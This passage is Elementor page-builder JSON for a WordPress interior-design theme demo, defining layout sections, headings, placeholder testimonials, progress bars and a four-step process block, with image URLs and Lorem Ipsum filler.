center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon 